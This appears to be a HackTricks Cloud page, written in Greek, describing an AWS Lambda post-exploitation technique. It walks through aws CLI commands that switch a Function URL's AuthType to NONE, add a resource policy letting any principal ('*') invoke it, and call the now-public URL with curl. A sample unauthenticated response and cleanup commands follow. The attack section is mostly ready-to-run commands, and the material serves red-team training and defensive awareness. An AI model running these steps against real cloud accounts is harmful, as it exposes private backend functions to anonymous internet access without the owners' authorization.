AWS - Lambda Function URL Δημόσια Έκθεση (AuthType NONE + Public Invoke Policy)

Tip

Μάθετε & εξασκηθείτε στο AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE)
Μάθετε & εξασκηθείτε στο GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE)
Μάθετε & εξασκηθείτε στο Az Hacking: HackTricks Training Azure Red Team Expert (AzRTE)

Υποστηρίξτε το HackTricks

• Δείτε τα subscription plans!
• Εγγραφείτε στο 💬 Discord group ή την telegram group ή ακολουθήστε μας στο Twitter 🐦 @hacktricks_live.
• Μοιραστείτε τα hacking tricks υποβάλλοντας PRs στα HackTricks και HackTricks Cloud github repos.

Μετατρέψτε ένα ιδιωτικό Lambda Function URL σε δημόσιο, μη αυθεντικοποιημένο endpoint αλλάζοντας το Function URL AuthType σε NONE και επισυνάπτοντας μια resource-based policy που χορηγεί lambda:InvokeFunctionUrl σε όλους. Αυτό επιτρέπει ανώνυμη κλήση εσωτερικών functions και μπορεί να εκθέσει ευαίσθητες λειτουργίες backend.

Κατάχρηση

• Προαπαιτούμενα: lambda:UpdateFunctionUrlConfig, lambda:CreateFunctionUrlConfig, lambda:AddPermission
• Περιοχή: us-east-1

Βήματα

1. Βεβαιωθείτε ότι η function έχει Function URL (προεπιλογή AWS_IAM):

aws lambda create-function-url-config --function-name $TARGET_FN --auth-type AWS_IAM || true

2. Αλλάξτε το URL σε δημόσιο (AuthType NONE):

aws lambda update-function-url-config --function-name $TARGET_FN --auth-type NONE

3. Προσθέστε μια δήλωση resource-based policy για να επιτρέψετε μη αυθεντικοποιημένους principals:

aws lambda add-permission --function-name $TARGET_FN --statement-id ht-public-url --action lambda:InvokeFunctionUrl --principal "*" --function-url-auth-type NONE

4. Ανακτήστε το URL και καλέστε χωρίς credentials:

URL=$(aws lambda get-function-url-config --function-name $TARGET_FN --query FunctionUrl --output text)
curl -sS "$URL"

Επιπτώσεις

• Η Lambda function γίνεται ανώνυμα προσβάσιμη μέσω του διαδικτύου.

Παράδειγμα εξόδου (μη αυθεντικοποιημένο 200)

HTTP 200
https://e3d4wrnzem45bhdq2mfm3qgde40rjjfc.lambda-url.us-east-1.on.aws/
{"message": "HackTricks demo: public Function URL reached", "timestamp": 1759761979, "env_hint": "us-east-1", "event_keys": ["version", "routeKey", "rawPath", "rawQueryString", "headers", "requestContext", "isBase64Encoded"]}

Καθαρισμός

aws lambda remove-permission --function-name $TARGET_FN --statement-id ht-public-url || true
aws lambda update-function-url-config --function-name $TARGET_FN --auth-type AWS_IAM || true

Tip

Μάθετε & εξασκηθείτε στο AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE)
Μάθετε & εξασκηθείτε στο GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE)
Μάθετε & εξασκηθείτε στο Az Hacking: HackTricks Training Azure Red Team Expert (AzRTE)

Υποστηρίξτε το HackTricks

• Δείτε τα subscription plans!
• Εγγραφείτε στο 💬 Discord group ή την telegram group ή ακολουθήστε μας στο Twitter 🐦 @hacktricks_live.
• Μοιραστείτε τα hacking tricks υποβάλλοντας PRs στα HackTricks και HackTricks Cloud github repos.